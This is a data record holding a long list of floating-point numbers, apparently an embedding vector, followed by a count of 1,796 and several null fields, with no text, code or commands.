0.0016707407776266336, 0.025851106271147728, -0.014722752384841442, 0.021542588248848915, -0.0033980158623307943, 0.01268751360476017, 0.011497315019369125, -0.0029635936953127384, 0.0038651686627417803, -0.0015606473898515105, 0.009902449324727058, -0.014484712854027748, 0.010955775156617165, 0.02423243597149849, -0.001038447953760624, 0.0006222504889592528, -0.013711083680391312, 0.0016201573889702559, 0.013461141847074032, -0.0008361142827197909, 0.0028177942149341106, -0.00016737163241486996, -0.006090839393436909, 0.0012943405890837312, -0.0011872227769345045, -0.0031659272499382496, -0.03868144378066063, 0.025827301666140556, 0.01319929864257574, -0.005474912002682686, -0.004549532663077116, 0.005855775438249111, -0.0061414227820932865, 0.002481563249602914, -0.0070459735579788685, -0.002341714920476079, 0.0036063005682080984, -0.010140488855540752, -0.012068609707057476, 0.02059043012559414, -0.032063938677310944, 0.014151456765830517, 0.022387629374861717, -0.019316917285323143, -0.017424501478672028, -0.03432531654834747, 0.0072542582638561726, -0.0014141042483970523, 0.006682963110506535, -0.007623219862580299, -0.0074922977946698666, -0.025327417999505997, 0.015115517191588879, 0.001989118754863739, -0.001251939800567925, 0.031468842178583145, 0.01653185300529003, 0.022697079926729202, 0.01671038381755352, 0.0016960324719548225, -0.01311598438769579, -0.005382671486586332, -0.01606767624616623, -0.0030260789208114147, 0.00423710560426116, -0.0069269537925720215, 0.004659626167267561, 0.004936347249895334, -0.020054839551448822, -0.015663009136915207, 0.0025261957198381424, 0.0009581095655448735, -0.02229241281747818, 0.010301165282726288, -0.008515868335962296, -0.014984595589339733, -0.009581095539033413, 0.02777922712266445, -0.00925379153341055, -0.017376894131302834, -0.010152391158044338, -0.035467907786369324, -0.009319252334535122, -0.012401865795254707, -0.0006207627593539655, -0.017079344019293785, -0.0163890291005373, -0.014984595589339733, -0.004957175813615322, -0.01979299634695053, -0.002285180613398552, 0.014782262034714222, 0.025541653856635094, 0.013806299306452274, 0.029588328674435616, -0.015734421089291573, -0.0026705071795731783, -0.016424736008048058, -0.009438271634280682, 0.03796732425689697, -0.012651807628571987, -0.03292088210582733, 0.0017272752011194825, 0.02699369564652443, -0.014449006877839565, -0.0055463239550590515, -0.0032849470153450966, 0.006230687722563744, -0.005028587765991688, 0.000955877942033112, 0.023220768198370934, -0.019019367173314095, -0.03415868803858757, 0.0017897605430334806, 0.02687467634677887, 0.010051224380731583, -0.005549299065023661, 0.01565110683441162, -0.0034366974141448736, 0.027350755408406258, 0.005195215344429016, -0.0002560785796958953, -0.005114877130836248, 0.014258574694395065, 0.014841771684587002, 0.01653185300529003, -0.005915285088121891, 0.0012690488947555423, 0.007789847441017628, 0.015543988905847073, 0.006194981746375561, -0.027945853769779205, -0.014663241803646088, 0.007349473889917135, -0.0005084378062747419, 0.004695332143455744, 0.008337338455021381, -0.004864935297518969, 0.0032908981665968895, 0.02373255230486393, -0.013853907585144043, 0.01035472471266985, 0.02170921489596367, 0.003677712520584464, 0.0022822050377726555, -0.001989118754863739, 0.015817735344171524, 0.0011663942132145166, -0.01847187615931034, 0.011699648573994637, -0.019876310601830482, -0.007891014218330383, -0.002624387154355645, 0.0029844220262020826, 0.012116217985749245, -0.004731038119643927, 0.006563943345099688, 0.021304547786712646, 0.0026318258605897427, 0.0027806006837636232, 0.007355425041168928, -0.00595396663993597, 0.008480162359774113, -0.009408516809344292, 0.027684010565280914, 0.01212812028825283, -0.007004316430538893, -0.0004585982533171773, 0.005367794074118137, -0.024065807461738586, -0.004954200237989426, -0.02863616868853569, 0.010682028718292713, -0.004731038119643927, -0.018257640302181244, 0.015520185232162476, -0.028802797198295593, -0.006129520945250988, -0.0043233949691057205, 0.0018269543070346117, 0.0032700696028769016, 0.011027186177670956, -0.026208166033029556, -0.0027612599078565836, 0.004019894637167454, 0.010640372522175312, -0.0011381270596757531, -0.008593231439590454, -0.015984361991286278, 0.009313301183283329, 0.01457992848008871, -0.017817268148064613, -0.010931970551609993, 0.00007289963832590729, 0.0043382723815739155, -0.017234070226550102, 0.00985484104603529, -0.005311259534209967, 0.022244805470108986, -0.0016781794838607311, 0.01117596123367548, -0.005102974828332663, -0.023458806797862053, 0.017043638974428177, -0.0030454196967184544, 0.0016499123303219676, 0.0015249415300786495, 0.0034783543087542057, 0.02167350985109806, -0.004329346120357513, -0.024303847923874855, 0.0004664089356083423, 0.010211900807917118, 0.004240081179887056, 0.008581329137086868, 0.012818435207009315, -0.010991481132805347, 0.0036122517194598913, -0.01685320772230625, -0.0013605454005300999, -0.011045039631426334, 0.001485516200773418, 0.024220533668994904, 0.0251131821423769, 0.01192578673362732, 0.020399997010827065, -0.01794818975031376, -0.00001545862869534176, 0.02341119945049286, -0.008170710876584053, -0.019185995683073997, -0.011788913048803806, 0.0066889142617583275, 0.02523220330476761, -0.0074684941209852695, 0.004778645932674408, -0.0017421526135876775, -0.007551807910203934, -0.015984361991286278, 0.007486347109079361, 0.016519950702786446, -0.009973861277103424, 0.01694842241704464, -0.026803264394402504, 0.015186929143965244, 0.0067127179354429245, 0.003302800003439188, -0.006319952663034201, 0.007789847441017628, 0.014270476996898651, 0.00592421181499958, 0.021959157660603523, 0.00681388471275568, 0.017733953893184662, 0.006956708617508411, 0.027707815170288086, -0.016365226358175278, 0.023185061290860176, 0.03275425359606743, -0.0222329031676054, -0.02026907540857792, -0.0011835034238174558, 0.0014512980123981833, 0.006349707487970591, 0.011414000764489174, 0.02229241281747818, 0.0010414234129711986, -0.008539672009646893, -0.00031335686799138784, 0.021840138360857964, -0.01715075597167015, 0.0025544629897922277, 0.008652741089463234, 0.007700582500547171, -0.02364923804998398, 0.022601865231990814, 0.01988821290433407, 0.0203285850584507, 0.0020173860248178244, 0.01148541271686554, 0.0031659272499382496, 0.010509449988603592, -0.012675611302256584, 0.02625577338039875, -0.011003382503986359, 0.003100466448813677, 0.002535122213885188, -0.004939322825521231, -0.019995329901576042, 0.012401865795254707, -0.0047607929445803165, 0.0109260194003582, 0.006001574452966452, -0.016662774607539177, -0.011806766502559185, 0.03249241039156914, 0.018983662128448486, -0.002167648635804653, -0.00091422104742378, -0.007057875394821167, 0.021518783643841743, 0.0023967616725713015, -0.012306650169193745, -0.011211667209863663, 0.017436403781175613, -0.019757291302084923, 0.005629637744277716, 0.016353324055671692, 0.011431854218244553, -0.017579227685928345, 0.001557671930640936, 0.016615167260169983, 0.0009588534594513476, -0.02064993977546692, -0.017436403781175613, 0.03934795409440994, -0.0109260194003582, -0.0012697927886620164, -0.007623219862580299, 0.01776965893805027, -0.008015984669327736, -0.002712164307013154, -0.004368027672171593, -0.0185075830668211, 0.026922283694148064, 0.0031927067320793867, -0.023161258548498154, -0.018102915957570076, 0.00721855228766799, -0.00030833572964183986, -0.020876077935099602, -0.011461609043180943, 0.009491831064224243, -0.035491712391376495, -0.01274702325463295, 0.018805131316184998, -0.006480629555881023, -0.01817432790994644, -0.009283546358346939, -0.005715927109122276, 0.006706767249852419, -0.008277828805148602, -0.004781621508300304, 0.020423801615834236, -0.001578500377945602, 0.008450407534837723, 0.021006999537348747, 0.009051457978785038, -0.008628937415778637, -0.021887745708227158, -0.014675144106149673, 0.008176662027835846, 0.0027448947075754404, 0.026327185332775116, 0.01063442137092352, 0.009450173936784267, -0.01588914729654789, -0.008765810169279575, 0.0017644688487052917, -0.016258107498288155, -0.019995329901576042, -0.009271644055843353, 0.007420885842293501, 0.0011083721183240414, 0.006736522074788809, 0.015543988905847073, -0.003246265696361661, 0.007170944474637508, -0.00149593036621809, -0.012592297047376633, -0.025565458461642265, -0.04696522280573845, -0.014425202272832394, 0.003999066073447466, 0.011229520663619041, 0.021863941103219986, -0.01809101365506649, -0.020602330565452576, 0.010199998505413532, 0.005174386780709028, -0.007022169418632984, -0.0020992120262235403, -0.01894795522093773, -0.016412833705544472, 0.0015695738838985562, -0.01903126947581768, 0.01482987031340599, 0.01525834109634161, 0.02661283314228058, 0.011586579494178295, -0.017983894795179367, -0.011663942597806454, -0.0016201573889702559, -0.0036896145902574062, -0.024268142879009247, -0.007652974687516689, 0.024184828624129295, 0.019816800951957703, 0.014651340432465076, -0.02226860821247101, -0.01682940311729908, 0.006867443677037954, 0.011134304106235504, 0.011384245939552784, 0.005064293276518583, 0.007551807910203934, -0.00472806254401803, -0.0028073801659047604, 0.010580861940979958, -0.014544222503900528, -0.013270710594952106, -0.012282845564186573, -0.002245011506602168, -0.003665810450911522, 0.0033325550612062216, 0.01997152715921402, 0.003195682307705283, 0.012026953510940075, 0.0018537337891757488, 0.010717734694480896, 0.0034366974141448736, -0.00898599624633789, -0.030611898750066757, -0.012163826264441013, 0.011598481796681881, 0.03377782553434372, 0.013413534499704838, -0.026660440489649773, -0.013211200013756752, 0.006605600006878376, -0.008682495914399624, -0.02825530618429184, 0.0037610263098031282, -0.0008658692240715027, -0.022125784307718277, 0.0008681008475832641, -0.009783429093658924, -0.01077724527567625, 0.01268751360476017, 0.012937454506754875, 0.016841305419802666, 0.01336592622101307, 0.02067374251782894, -0.008849123492836952, -0.019400231540203094, 0.009152624756097794, -0.00988459587097168, -0.022459041327238083, 0.0004835180297959596, -0.010253557935357094, -0.002572315977886319, 0.024660907685756683, -0.009473977610468864, -0.010676078498363495, -0.0394669733941555, -0.002883255248889327, -0.0007937134359963238, 0.024339552968740463, -0.0038354138378053904, -0.00013333940296433866, -0.01932881958782673, -0.025517849251627922, 0.018138621002435684, 0.019566858187317848, -0.0181267186999321, 0.021018899977207184, -0.010063125751912594, 0.012651807628571987, -0.0038056587800383568, -0.013925319537520409, 0.0028758165426552296, 0.02473231963813305, 0.0022464990615844727, 0.00881341751664877, 0.0021512832026928663, -0.013889613561332226, -0.014044338837265968, -0.012211433611810207, -0.002868377836421132, -0.009842939674854279, -0.02015005610883236, -0.004897665698081255, 0.008640838786959648, -0.01662706956267357, -0.0016067676478996873, 0.00662940414622426, -0.015805833041667938, 0.018257640302181244, -0.014663241803646088, 0.015294047072529793, 0.004906592424958944, 0.018221935257315636, 0.0034634768962860107, 0.006314001511782408, -0.010378528386354446, -0.030469074845314026, 0.017912482842803, -0.009997664950788021, -0.008962192572653294, 0.0005746425595134497, 0.0035646436735987663, -0.005623686593025923, -0.01923360303044319, -0.010568960569798946, 0.005596907343715429, 0.02267327718436718, 0.005394573323428631, 0.006575845181941986, 0.015436870977282524, 0.0016037920722737908, 0.02311364933848381, 0.02179252915084362, 0.002011435106396675, -0.004397782497107983, 0.001449066330678761, 0.008962192572653294, 0.006932904943823814, -0.0189717598259449, -0.01412765309214592, 0.00819451455026865, -0.006183079909533262, -0.002347666071727872, 0.004005017224699259, -0.022625667974352837, -0.004606067202985287, -0.013925319537520409, 0.022923218086361885, -0.015222635120153427, -0.008188563399016857, -0.003371236613020301, 0.011669893749058247, 0.010473744012415409, -0.0026987744495272636, -0.019316917285323143, 0.00906335934996605, -0.0004128500004298985, -0.011039088480174541, -0.0017064467538148165, -0.02537502720952034, -0.018602797761559486, -0.011247373186051846, -0.016900815069675446, -0.004725086968392134, 0.0020694572012871504, 0.008521819487214088, -0.01381820160895586, -0.005454083438962698, 0.012354257516562939, -0.001651400001719594, 0.012104315683245659, -0.0016216450603678823, 0.008331387303769588, 0.003033517859876156, -0.009997664950788021, -0.01785297319293022, -0.013746789656579494, -0.004329346120357513, 0.012003148905932903, 0.00662940414622426, -0.028445737436413765, 0.0017570301424711943, -0.0200310368090868, 0.02053091861307621, 0.007337572053074837, -0.00222418294288218, -0.000015970043023116887, 0.020840371027588844, 0.0033176776487380266, -0.0027612599078565836, -0.010128586553037167, -0.019138388335704803, 0.009539438411593437, -0.005891481414437294, -0.02053091861307621, -0.00135087501257658, 0.033325549215078354, 0.0005646002828143537, 0.011872227303683758, 0.009950057603418827, 0.0068079340271651745, 0.009009800851345062, 0.01243757177144289, 0.00791481789201498, -0.023185061290860176, 0.02537502720952034, -0.0009224036475643516, 0.028326718136668205, 0.014103849418461323, -0.00205606734380126, -0.00021516552078537643, -0.0018016626127064228, -0.012199532240629196, -0.015341655351221561, -0.0027077009435743093, 0.020459508523344994, 0.005043465178459883, 0.012354257516562939, -0.001615694141946733, 0.01979299634695053, -0.015758223831653595, 0.0024845388252288103, -0.004972053226083517, 0.0032075841445475817, 0.02525600604712963, 0.0010153878247365355, -0.0023595679085701704, 0.0013486433308571577, -0.016757991164922714, 0.003546790685504675, 0.009051457978785038, 0.005454083438962698, -0.007641072850674391, 0.005763534922152758, -0.0006706023123115301, -0.015329753048717976, 0.041276074945926666, 0.00850396603345871, -0.008997898548841476, 0.007944573648273945, -0.003085589036345482, 0.011860325001180172, 0.005367794074118137, -0.02229241281747818, 0.012068609707057476, -0.02067374251782894, 0.0036539086140692234, 0.03977642580866814, 0.009319252334535122, -0.0036687860265374184, -0.017614934593439102, 0.009152624756097794, -0.012568493373692036, -0.018614700064063072, -0.012508983723819256, -0.014484712854027748, 0.006072986405342817, 0.001599328825250268, 0.009331153705716133, -0.012032903730869293, 0.008111201226711273, -0.001001998083665967, 0.020519018173217773, 0.0100155184045434, -0.03896709159016609, 0.03403966873884201, -0.003874095156788826, -0.006314001511782408, 0.005980746354907751, 0.0024473450612276793, -0.004704258404672146, 0.0017704198835417628, 0.015127419494092464, -0.014806065708398819, -0.023280277848243713, -0.0069269537925720215, -0.01038447953760624, 0.014175261370837688, -0.013044572435319424, 0.005787339061498642, -0.01756732538342476, 0.002686872612684965, -0.007742239627987146, -0.000013412975931714755, -0.004201399628072977, -0.0026005832478404045, -0.017638737335801125, 0.028707580640912056, -0.008819368667900562, 0.006587747018784285, -0.0029695446137338877, -0.014984595589339733, -0.01192578673362732, 0.017722051590681076, -7.554969272405287e-8, 0.0010139001533389091, 0.01004527322947979, -0.021042704582214355, -0.0028445736970752478, -0.00672462023794651, -0.0044037336483597755, -0.016424736008048058, -0.014401398599147797, -0.0010533254826441407, -0.0022658398374915123, 0.01732928678393364, 0.0054421816021203995, 0.006206883583217859, -0.0023030336014926434, 0.006385413464158773, -0.0068079340271651745, 0.012199532240629196, -0.0025693404022604227, -0.011628236621618271, -0.02249474637210369, -0.0010867997771129012, -0.0015859392005950212, 0.003615227062255144, 0.004858984146267176, -0.0033533836249262094, 0.006177128758281469, -0.012877944856882095, 0.0023699821904301643, -0.006849590688943863, 0.004817327484488487, 0.0006304331473074853, 0.003127245930954814, 0.014508516527712345, -0.003106417367234826, 0.008884829469025135, 0.008039789274334908, 0.010670127347111702, 0.01362776942551136, -0.01004527322947979, -0.0019087804248556495, 0.005355892237275839, -0.0012735121417790651, -0.010801048949360847, 0.006409217603504658, 0.005114877130836248, -0.009473977610468864, 0.013389729894697666, -0.00033232566784136, 0.02435145527124405, -0.0046566505916416645, 0.0011753207072615623, 0.009384713135659695, -0.01286604255437851, -0.008849123492836952, -0.0019325843313708901, -0.0028698653914034367, -0.005275553558021784, 0.01665087416768074, -0.003781854873523116, 0.015103615820407867, -0.014056241139769554, -0.0022256707306951284, -0.006581796333193779, -0.005531446076929569, 0.016258107498288155, -0.010723685845732689, 0.0031927067320793867, 0.010223803110420704, 0.010319018736481667, 0.007420885842293501, 0.023125551640987396, -0.016031969338655472, -0.025160791352391243, -0.008170710876584053, 0.002120040589943528, -0.007998132146894932, 0.011747256852686405, 0.0001506344706285745, 0.01412765309214592, 0.003796732285991311, 0.011538972146809101, -0.024244338274002075, -0.016353324055671692, 0.006962659768760204, 0.001661814283579588, -0.01468704640865326, -0.014449006877839565, 0.0072602094151079655, -0.003871119813993573, 0.02561306580901146, 0.00032395709422416985, 0.015520185232162476, 0.004653675016015768, 0.00813500490039587, -0.010253557935357094, 0.024779926985502243, 0.009283546358346939, -0.01469894777983427, 0.005046440288424492, 0.01438949629664421, -0.0014036900829523802, 0.013020768761634827, -0.0037074675783514977, -0.005909334402531385, 0.0002107022883137688, 0.0009380250121466815, -0.0026556297671049833, -0.0037312714848667383, 0.007896965369582176, 0.03211154788732529, 0.024208631366491318, 0.007432788144797087, -0.00408237986266613, 0.006099766120314598, 0.007301866076886654, -0.00942637026309967, -0.03025483898818493, 0.010735588148236275, -0.008063592948019505, 0.0014817968476563692, -0.00395740894600749, 0.018638504669070244, -0.012259041890501976, 0.024422867223620415, 0.01199719775468111, 0.009610850363969803, -0.003942531533539295, -0.005239847581833601, 0.012003148905932903, -0.020638037472963333, 0.013806299306452274, 0.015151223167777061, 0.009587046690285206, 0.009027653373777866, -0.015805833041667938, -0.003094515297561884, 0.006409217603504658, 0.030469074845314026, -0.01817432790994644, 0.02126884274184704, -0.01882893592119217, -0.008456358686089516, -0.03315892443060875, -0.006061084568500519, 0.010313067585229874, -0.024446671828627586, -0.004415635485202074, -0.0007289964123629034, 0.008099298924207687, 0.0007699094712734222, 0.006956708617508411, -0.005986697040498257, 0.001371703459881246, -0.005159509368240833, 0.028826601803302765, -0.008123102597892284, 0.008063592948019505, 0.011414000764489174, 0.011199765838682652, 0.010069076903164387, -0.00036282450309954584, 0.0061414227820932865, 0.00951563473790884, -0.005177362356334925, -0.019566858187317848, 0.004626895766705275, 0.037110380828380585, 0.009700115770101547, 0.012032903730869293, -0.017103148624300957, 0.0029278877191245556, 0.008027886971831322, 0.0033444571308791637, -0.007516101934015751, 0.00028137030312791467, 0.017186462879180908, 0.012449473142623901, -0.007289964240044355, 0.014734653756022453, -0.0021512832026928663, 0.014318084344267845, 0.004296615719795227, 0.006218785885721445, -0.0000258728632616112, -0.015793930739164352, -0.004445390310138464, 0.02699369564652443, 0.007837455719709396, 0.009307350032031536, 0.018555190414190292, -0.008426603861153126, 0.02623196877539158, -0.0017704198835417628, -0.005165460519492626, 0.011604432947933674, -0.022482844069600105, 0.0111164515838027, 0.005239847581833601, -0.014353790320456028, -0.011788913048803806, 0.0010667152237147093, 0.008337338455021381, -0.007902916520833969, 0.013151690363883972, -0.015020301565527916, -0.027660207822918892, 0.005531446076929569, 0.019114583730697632, -0.002014410449191928, 0.0034247953444719315, -0.029540719464421272, 0.007593464571982622, 0.0022137686610221863, -0.0013687280006706715, 0.010830803774297237, -0.00040280772373080254, 0.027588795870542526, -0.0312546044588089, 0.0050077592022717, -0.02587490901350975, 0.007224503438919783, -0.03292088210582733, -0.012056708335876465, -0.0018403440481051803, -0.002176575129851699, 0.002768698614090681, -0.024077709764242172, 0.009384713135659695, -0.015317851677536964, 0.00040689902380108833, 0.0047667440958321095, -0.0016945446841418743, -0.015175027772784233, 0.015044105239212513, -0.005207117181271315, -0.014341888949275017, 0.006165226921439171, -0.00709358137100935, -0.007968377321958542, -0.0006784129654988647, -0.020638037472963333, 0.00420735077932477, -0.01049754861742258, -0.01086650975048542, 0.009241889230906963, -0.017305482178926468, 0.010551107116043568, -0.0036122517194598913, -0.001693057012744248, 0.007754141464829445, -0.000659444194752723, 0.00085173558909446, 0.002972520189359784, 0.012794630602002144, 0.023161258548498154, -0.021923450753092766, -0.015115517191588879, -0.008378995582461357, -0.010937921702861786, -0.007760092616081238, -0.024399064481258392, 0.003231388283893466, -0.0014661754248663783, -0.008855074644088745, 0.007278062403202057, 0.0006512615946121514, 0.0033742119558155537, -0.021744921803474426, -0.0026943113189190626, 0.017614934593439102, -0.0033206529915332794, 0.031587861478328705, -0.014341888949275017, 0.0034456239081919193, 0.02067374251782894, -0.0010518376948311925, 0.020947488024830818, 0.01513932179659605, -0.00048537770635448396, 0.006099766120314598, -0.009807233698666096, 0.0015368434833362699, 0.03492041677236557, 0.0068317377008497715, 0.004469194449484348, -0.016341421753168106, -0.010122636333107948, 0.014103849418461323, -0.00903360452502966, 0.01844807341694832, 0.006962659768760204, -0.00494229793548584, -0.001740664942190051, -0.0038056587800383568, -0.0010406796354800463, 0.00003598490002332255, 0.008396848104894161, 0.004921469837427139, 0.01682940311729908, -0.015175027772784233, 0.007986229844391346, 0.008593231439590454, -0.0018358808010816574, 0.0029472282622009516, 0.0011239934246987104, -0.020864175632596016, -0.01182461902499199, 0.017817268148064613, 0.006153325084596872, -0.0018864641897380352, -0.016603264957666397, -0.006373511627316475, 0.01809101365506649, 0.012401865795254707, -0.0143775949254632, -0.0021810382604599, -0.003076662542298436, -0.022161491215229034, 0.017245972529053688, -0.00574270635843277, 0.01694842241704464, 0.02623196877539158, 0.003231388283893466, -0.0017109100008383393, -0.01565110683441162, 0.0006397315301001072, 0.004930396098643541, 0.017495913431048393, -0.01167584490031004, 0.02393488585948944, -0.006700816098600626, -0.015115517191588879, -0.0016945446841418743, 0.0011076282244175673, -0.011431854218244553, -0.009533488191664219, 0.007426836993545294, 0.014246673323214054, -0.019126486033201218, 0.025398829951882362, 0.014556124806404114, 0.01193768810480833, -0.014722752384841442, -0.02159019559621811, 0.00202631251886487, -0.014413300901651382, 0.004662601742893457, 0.006962659768760204, -0.007444689981639385, -0.012758924625813961, 0.00117457692977041, 0.01344924047589302, 0.013603965751826763, 0.016031969338655472, -0.021863941103219986, -0.017543522641062737, -0.013699181377887726, 0.024660907685756683, 0.00908716395497322, 0.019305014982819557, 0.00906335934996605, 0.018436171114444733, -0.011634187772870064, -0.0007959450595080853, 0.009932204149663448, -0.0089145852252841, 0.0061176191084086895, 0.004903616849333048, -0.0037342470604926348, -0.03137362375855446, 0.011080745607614517, 0.021578293293714523, -0.0003546418738551438, 0.012651807628571987, -0.013722985982894897, -0.011283079162240028, -0.015663009136915207, -0.00036635788273997605, 0.009247840382158756, -0.007962426170706749, 0.016055773943662643, 0.007938622497022152, 0.0006482860771939158, 0.012877944856882095, 0.027422167360782623, -0.010199998505413532, -0.025279810652136803, -0.014734653756022453, -0.00013240955013316125, 0.00346942781470716, -0.009420419111847878, -0.01375869195908308, 0.008271877653896809, -0.03770548105239868, 0.0064746784046292305, 0.0021170650143176317, 0.01123547088354826, 0.004951224662363529, -0.026850871741771698, 0.033325549215078354, 0.02267327718436718, 0.015960559248924255, 0.025089379400014877, -0.0023134478833526373, 0.025327417999505997, 0.004570361226797104, -0.0023878351785242558, -0.014841771684587002, -0.02364923804998398, 0.006480629555881023, 0.010795097798109055, 0.012675611302256584, 0.004564410075545311, -0.001043655094690621, 0.0251131821423769, 0.017519718036055565, 0.0033980158623307943, 0.03015962243080139, 0.0025023918133229017, 0.02349451370537281, 0.009878645651042461, 0.01187817845493555, 0.0029383020009845495, -0.01894795522093773, 0.010878412052989006, -0.015377361327409744, 0.014663241803646088, 0.03941936418414116, -0.01841236650943756, 0.02687467634677887, 0.020626135170459747, 0.007938622497022152, -0.006385413464158773, 0.015853440389037132, 0.0018418317195028067, -0.009408516809344292, -0.001986143412068486, -0.01600816659629345, -0.0011983808362856507, 0.007771994452923536, -0.00696861045435071, -0.008991947397589684, 0.006974561605602503, 0.012818435207009315, 0.019126486033201218, 0.011949590407311916, 0.00447812071070075, -0.003261143108829856, 0.016281912103295326, -0.00019015275756828487, 0.012580395676195621, -0.0030736869666725397, -0.021435469388961792, -0.010182145982980728, 0.011068843305110931, 0.014460908249020576, 0.015424968674778938, -0.007069777697324753, -0.018733719363808632, 0.003558692755177617, 0.019781094044446945, -0.012818435207009315, -0.024518083781003952, 0.008021935820579529, -0.01393722090870142, 0.004460267722606659, -0.007932671345770359, 0.004662601742893457, 0.010872460901737213, -0.010259509086608887, -0.019578760489821434, -0.004025845322757959, -0.02170921489596367, -0.015282145701348782, 0.00687934597954154, 0.020102448761463165, -0.006867443677037954, -0.029231268912553787, 0.00494229793548584, -0.033349353820085526, 0.0002914126089308411, 0.02563687041401863, -0.023565925657749176, -0.00850396603345871, -0.014246673323214054, -0.012199532240629196, -0.0023193988017737865, -0.0027329926379024982, -0.021221235394477844, 0.01286604255437851, -0.02220909856259823, 0.005091072991490364, -0.01915028877556324, -0.011556824669241905, 0.01624620519578457, 0.0046417731791734695, -0.024541888386011124, -0.0010466305539011955, -0.0035676192492246628, 0.007105483673512936, -0.015020301565527916, -0.009914351627230644, 0.003281971672549844, 0.005454083438962698, -0.016757991164922714, -0.017722051590681076, 0.0014260062016546726, -0.0026719949673861265, -0.020280977711081505, 0.013711083680391312, -0.0017882728716358542, -0.005921236239373684, -0.018817033618688583, 0.010872460901737213, 0.028183894231915474, -0.005629637744277716, 0.00411213468760252, 0.022708982229232788, -0.007748190313577652, 0.008087396621704102, -0.0036598595324903727, -0.0237563569098711, -0.0054630097001791, 0.007801749277859926, -0.0026035585906356573, 0.017317384481430054, -0.011759158223867416, 0.01274702325463295, 0.0174483060836792, -0.0036390312016010284, 0.0019697779789566994, -0.011896030977368355, 0.015294047072529793, 0.001630571554414928, 0.024077709764242172, 0.01961446739733219, -0.018983662128448486, -0.006319952663034201, 0.022066274657845497, 0.007022169418632984, 0.007129287347197533, -0.009051457978785038, 0.0069507574662566185, 0.004716160707175732, 0.010426136665046215, 0.0034158688504248857, -0.009771527722477913, -0.02287561073899269, -0.019400231540203094, 0.002186989178881049, 0.020721351727843285, -0.002971032401546836, -0.004058576188981533, 0.012473277747631073, 0.025160791352391243, -0.005596907343715429, -0.008087396621704102, 0.0013486433308571577, -0.0016871059779077768, 0.01280653290450573, -0.027541186660528183, 0.013187396340072155, -0.01838856190443039, -0.013675377704203129, 0.017864875495433807, -0.019197897985577583, 0.007367326878011227, -0.013389729894697666, 0.03439673036336899, -0.004847082309424877, -0.013282611966133118, -0.012842238880693913, 0.0056802211329340935, -0.038514815270900726, -0.0022048421669751406, -0.00036710177664645016, 0.001693057012744248, 0.0005500947590917349, 0.029802564531564713, -0.004495973698794842, -0.02203056961297989, -0.012330453842878342, -0.011747256852686405, 0.001864147954620421, -0.006915051955729723, -0.02761259861290455, -0.02965974062681198, -0.006200932897627354, 0.008420652709901333, -0.007510150782763958, 0.03594398498535156, 0.01105694193392992, 0.01375869195908308, 0.021578293293714523, -0.00020400741777848452, -0.006891247816383839, -0.006105716805905104, -0.005355892237275839, -0.006915051955729723, -0.008825319819152355, 0.004873861558735371, -0.014472810551524162, 0.01762683503329754, 0.010122636333107948, 0.005504666827619076, -0.01406814344227314, 0.00009707554272608832, -0.005873628426343203, 0.009366859681904316, -0.004933371674269438, -0.0037015164270997047, -0.011544923298060894, 0.0021334304474294186, -0.014008632861077785, -0.004936347249895334, 0.01685320772230625, 0.015401165001094341, -0.004668552428483963, 0.012062659487128258, -0.01145565789192915, 0.0027181152254343033, -0.010086930356919765, 0.00841470155864954, -0.011158108711242676, 0.006147373933345079, 0.009384713135659695, -0.007777945604175329, 0.009337104856967926, -0.0070459735579788685, -0.017103148624300957, 0.00948587991297245, 0.007105483673512936, -0.011634187772870064, 0.009414467960596085, 0.011556824669241905, 0.020876077935099602, -0.004623920191079378, 0.003496207296848297, -0.020257173106074333, -0.0054511078633368015, 0.008688447065651417, 0.005745681934058666, 0.00006718111399095505, 0.023720650002360344, -0.003418844426050782, -0.005299357697367668, -0.006084888242185116, -0.02851714938879013, -0.01362776942551136, -0.015591597184538841, -0.0069507574662566185, -0.007289964240044355, 0.0009238913771696389, 0.010319018736481667, -0.015960559248924255, 0.019697781652212143, -0.01105694193392992, 0.012508983723819256, -0.013223102316260338, 0.013663475401699543, -0.006046207156032324, 0.00008647533832117915, -0.010509449988603592, 0.0023670068476349115, -0.004156767390668392, -0.02226860821247101, 0.018436171114444733, -0.007349473889917135, -0.00475781736895442, -0.012592297047376633, 0.002093261107802391, 0.006314001511782408, 0.010313067585229874, -0.011003382503986359, -0.012354257516562939, -0.0009261230006814003, -0.007301866076886654, -0.0019266334129497409, 0.0015197343891486526, 0.0196501724421978, -0.00017378754273522645, 0.020459508523344994, -0.021042704582214355, -0.007593464571982622, 0.003049883060157299, -0.010503499768674374, -0.014329986646771431, 0.012485179118812084, 0.0066889142617583275, -0.0032938735093921423, -0.021161723881959915, 0.007087630685418844, -0.0053380392491817474, -0.0044334884732961655, -0.005805192049592733, -0.0018477827543392777, -0.010366627015173435, -0.04548937827348709, -0.014103849418461323, 0.007516101934015751, -0.009307350032031536, 0.0056950985454022884, -0.018186228349804878, 0.0059331380762159824, -0.004103208426386118, 0.005629637744277716, -0.0006174153531901538, 0.012140021659433842, 0.01249708142131567, 0.011294981464743614, -0.013032671064138412, -0.0089562414214015, 0.01915028877556324, 0.012580395676195621, 0.0006192750297486782, -0.006206883583217859, 0.003924678545445204, 0.02751738391816616, -0.004186522215604782, -0.012675611302256584, -0.007813651114702225, -0.0117948642000556, -0.0033831384498625994, -0.0005218275473453104, 0.01114620640873909, 0.016805598512291908, -0.0038919481448829174, -0.003198657650500536, 0.02349451370537281, -0.0022464990615844727, -0.0022822050377726555, 0.04108564183115959, 0.011991247534751892, -0.006611551158130169, 0.006349707487970591, -0.012062659487128258, -0.008081446401774883, -0.0007033327710814774, 0.01218762993812561, -0.042013999074697495, 0.01356825977563858, 0.00472806254401803, 0.0023238621652126312, -0.011068843305110931, -0.004501924850046635, 0.03680092841386795, -0.0019489496480673552, -0.003231388283893466, -0.022185295820236206, 0.017400698736310005, -0.0033742119558155537, -0.0029159856494516134, 0.0030067383777350187, -0.0015338680241256952, 0.008950290270149708, -0.0002789527061395347, -0.011628236621618271, -0.0074922977946698666, 0.015222635120153427, -0.0060521578416228294, -0.0031897311564534903, 0.0016856183065101504, 0.001200612518005073, 0.015496380627155304, 0.006563943345099688, 0.018364759162068367, 0.0035140602849423885, -0.010420185513794422, 0.006956708617508411, -0.00866464339196682, 0.010366627015173435, -0.003987164236605167, -0.003454550402238965, -0.006873394828289747, -0.009682262316346169, 0.009807233698666096, -0.019566858187317848, 0.0025380977895110846, 0.00028137030312791467, 0.0007464774535037577, -0.0008859538356773555, 0.0016871059779077768, 0.011324736289680004, -0.021316450089216232, 0.01375869195908308, -0.007141189184039831, 0.008569426834583282, -0.018257640302181244, 0.029469307512044907, -0.009027653373777866, -0.001096470165066421, -0.00662940414622426, 0.007986229844391346, 0.03232578560709953 ]
1,796
null
null
null
null
null
null
null
null
null
